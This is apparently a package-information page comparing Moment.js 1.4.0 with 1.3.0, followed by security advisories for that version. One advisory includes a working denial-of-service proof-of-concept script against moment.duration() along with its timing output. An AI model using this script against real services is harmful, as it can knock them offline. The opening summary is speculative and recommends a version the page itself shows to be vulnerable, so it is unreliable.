Moment.js version 1.4.0, released on February 3, 2012, builds upon the foundation laid by version 1.3.0, released almost a month earlier on January 5, 2012. While both versions offer the core functionality of creating, manipulating, and formatting dates in JavaScript without modifying the native Date object, a notable difference lies in the development dependencies used. Version 1.4.0 introduces a suite of tools for development and optimization, including gzip for compression, jade for templating (likely for documentation or website generation), qunit for testing, bunker (purpose unclear without further context), jshint for code quality, clean-css for CSS minification, and uglify-js for JavaScript minification.
This signifies a move towards a more robust and streamlined development process. For developers using Moment.js, this translates to a more stable and potentially optimized library. Although no breaking changes or new features are explicitly apparent from the metadata provided, the inclusion of these development tools hints at improvements in code quality, performance, and maintainability in the newer version. Therefore, upgrading to version 1.4.0 is recommended for developers seeking a more refined and actively developed date manipulation solution if no compatibility issues are present. The core promise of Moment.js remains consistent: a powerful and easy-to-use date library, but with the added benefit of a more rigorously maintained codebase in the later release.
All the vulnerabilities related to the version 1.4.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: